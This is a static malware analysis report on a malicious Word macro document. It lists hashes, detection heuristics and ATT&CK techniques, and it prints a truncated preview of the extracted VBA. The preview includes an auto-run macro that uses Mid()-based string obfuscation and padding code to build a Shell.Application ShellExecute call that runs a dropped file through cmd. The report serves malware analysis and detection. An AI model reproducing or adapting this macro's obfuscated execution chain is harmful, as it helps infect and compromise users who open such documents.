Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 33fd310d0e9f17d7…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 116.4 KB
Created: 2019-07-29 05:47:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2020-07-24

MD5: 8782798ce3fbf896f0a4d1159f97978c
SHA-1: c9fb001ee8410cf44a526b583982389b75fb6942
SHA-256: 33fd310d0e9f17d72ae9c4b97174e21b2bc31b730f566a55ddc7816d8b83c586

Risk Score: 182

Malware Insights

MITRE ATT&CK:
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious OOXML document containing a Document_Open VBA macro. This macro uses CreateObject and CallByName to execute a command. The reconstructed command is 'cmd /cw /c "C:\Users\Public\document.doc"', which suggests an attempt to run a malicious payload. The macro also appears to interact with Outlook, potentially for further distribution or information gathering.

Heuristics (6)

  • VBA project inside OOXML [medium] OOXML_VBA (4 related findings)
    Document contains a VBA project — VBA macros present
  • Document_Open macro [high] OLE_VBA_DOCOPEN
  • CreateObject call [high] OLE_VBA_CREATEOBJ
  • CallByName call [high] OLE_VBA_CALLBYNAME
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the following URLs were found in document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 5516 bytes
  SHA-256: 308ef69e66be28c72d1c3add2bcc226230a9c2fea48aed05526d3bf98e1f9073

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Kolers As String
Public Bopers As String
Public Ferasz As String
Public Bpersa As String
Private Veropler As String
Private Zipers As String
Private Reversa As String
Private Handelpo As String

Private Sub SaintPaint()
 Enum_All_Records
 CallByName CreateObject(Handelpo & "." & Reversa), Handelpo & Bpersa, VbMethod, Bopers & Handelpo, "c" & "md /cw" & Kolers & " " & "/" & Ferasz & Kolers & " " & Chr(92) & Chr(34) & Zipers & Chr(92) & Chr(34), Empty, Empty, 0
End Sub
 
Private Sub WayByWay(xer As String)
  Dim Nersado As String, Poresax As Integer
  Nersado = ActiveDocument.FullName + "x" + xer
  Poresax = FreeFile
  Open Nersado For Binary Lock Read Write As #Poresax
  Put #Poresax, , ActiveDocument.Content.Text
  Close #Poresax
  Zipers = Nersado
End Sub

Public Sub SubjectFilter()
  Dim Folder As Outlook.MAPIFolder
  Dim obj As Object
  Dim Mail As Outlook.MailItem
  Dim View As Outlook.View
  Dim Find As String, DASL As String
  Dim Filter As String
  Dim ViewName As String
  Dim Created As Boolean
  
  'Name of your custom view
  ViewName = "My-View"
  
  Set obj = Application.ActiveExplorer.Selection(1)
  
  If Not TypeOf obj Is Outlook.MailItem Then
    'this sample is for emails
    Exit Sub
  End If
  
  Set Mail = obj
  Set Folder = Mail.Parent
  
  '[Property] = [Value]
  Filter = "#0 = '#1'"
  
  'DASL-Name of the property we want to search
  DASL = "/0x0037001F"
  
  'Value to search for
  Find = Mail.Subject
  
  'Find or create the view
  Set View = Folder.CurrentView
  If LCase$(View.Name) <> LCase$(ViewName) Then
    Set View = Folder.Views(ViewName)
    If View Is Nothing Then
      Set View = Folder.Views.Add(ViewName, olTableView, olViewSaveOptionAllFoldersOfType)
      Created = True
    End If
  End If
  
  'Apply filter
  DASL = Chr(34) & DASL & Chr(34)
  Filter = Replace(Filter, "#0", DASL)
  Filter = "(" & Filter & ")"
  Filter = Replace(Filter, "#1", Find)
  
  View.Filter = Filter
  View.Apply
  If Created Then View.Save
End Sub

Function SQL_in_comments()
On Error Resume Next
    SQL_in_comments = Replace(Replace(Application.VBE.ActiveCodePane.CodeModule.Lines(2, 3), "'   ", ""), "'", "")
End Function

Public Sub Enum_All_Records()
Dim Car As CarClass
Dim str As String, s As Variant
Dim largeString As String

Set Car = New CarClass

str = "Hello there John!"

largeString = "This is a long block of text that I want to fill " & _
              "into a form field. I need to make sure I pay attention " & _
              "to spacing and carriage return issues while doing so. " & _
              "I also have to use quotes liberally, the concatenation " & _
              "operator, and the continuance underscore to make sure " & _
              "VBA can parse my code." & vbCr & vbCr & _
              "It's kind of a pain in the ass and I wish I could use " & _
              "a heredoc instead, letting me copy and paste the block" & _
              "of text I need from another source and shove it into " & _
              "a string."
              
              SQL_in_comments
Reversa = Mid("fex the appli" & "cation", 9, 11)
 
'Get first 5 characters from the Left
Debug.Print Left(Reversa, 5) 'Result: "Hello"

Handelpo = Mid("Sem a probe sh" & "ell", 13, 5)
 
'Get first 5 characters from the Right
Debug.Print Right(Handelpo, 5) 'Result: "John!"

Bopers = Mid("Machine Po" & "wer off", 9, 5)
 
'Get 5 characters starting at the 7th character
Debug.Print Mid(Bopers, 7, 5) 'Result: "there"
 
'Split the sentence into words separated by a SPACE and print them
For Each s In Split(str, " ")
   Debug.Print s
Next
Car.TestCarClass


Kolers = Mid("InDA Scr" & "ipt", 6, 6)
Ferasz = Mid("DERETE:JIMM", 6, 
... (truncated)
Artifact 2
  Filename: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: word/vbaProject.bin
  Size: 46592 bytes
  SHA-256: 3dd09bc52bdb29f03745c77517b0c47d0efea80c53bf5fa76bc1074a060f051e